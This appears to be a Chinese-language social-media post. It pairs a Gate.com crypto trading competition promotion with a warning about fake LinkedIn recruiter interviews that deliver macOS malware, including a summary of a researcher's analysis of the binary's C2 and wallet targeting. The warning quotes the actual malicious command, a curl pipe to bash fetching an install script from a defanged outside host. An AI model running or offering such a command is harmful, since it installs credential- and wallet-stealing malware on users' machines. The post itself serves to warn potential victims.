🔥 WCTC S8 全球交易賽正式開賽!
8,000,000 USDT 超級獎池解鎖開啟
🏆 團隊賽:上半場正式開啟,預報名階段 5,500+ 戰隊現已集結
交易量收益額雙重比拼,解鎖上半場 1,800,000 USDT 獎池
🏆 個人賽:現貨、合約、TradFi、ETF、閃兌、跟單齊上陣
全場交易量比拼,瓜分 2,000,000 USDT 獎池
🏆 王者 PK 賽:零門檻參與,實時匹配享受戰鬥快感
收益率即時 PK,瓜分 1,600,000 USDT 獎池
活動時間:2026 年 4 月 23 日 16:00:00 - 2026 年 5 月 20 日 15:59:59 UTC+8
⬇️ 立即參與:https://www.gate.com/competition/wctc-s8
#WCTCS8
小心假招聘面試。它們現在已成為最乾淨的惡意軟件傳播途徑之一。
我兄弟這週差點中招。
步驟如下:
> 一個“招聘官”在LinkedIn上聯繫他
> 他們實際上已經閱讀了他的履歷。他們知道他的技術棧。他們預約了一個真正的面試時間。
> 通話前幾個小時:“你能在我們談之前快速瀏覽一下我們的產品頁面嗎?”
> 訪問該網站時,背景會執行以下命令:
curl -s macos[.]hyperhives[.]net/install | nohup bash &
如果你在提示時輸入密碼,就完了。
一位研究員(Darksp33d在Github)反向工程了這個二進制文件:
> 每個配置字符串都用570個獨特的自定義函數加密
> 解包後:完整的C2伺服器、完整的端點列表,以及一個與開發者在法律傳票下相關聯的sentry錯誤追蹤DSN
> 276個針對Chrome擴展ID,涵蓋188個加密貨幣錢包
> 與朝鮮“傳染性面試”的TTP重疊度很高
> 在VirusTotal上的得分為9/64。CrowdStrike、Sophos、Malwarebytes都未檢測出來
真正的招聘官、真正的履歷、真正的面試時間、看起來真的網站。一行curl就能掏空你的錢包。
如果“招聘官”讓你在終端中運行任何東西,即使是看似無害的構建腳本,也要關閉標籤。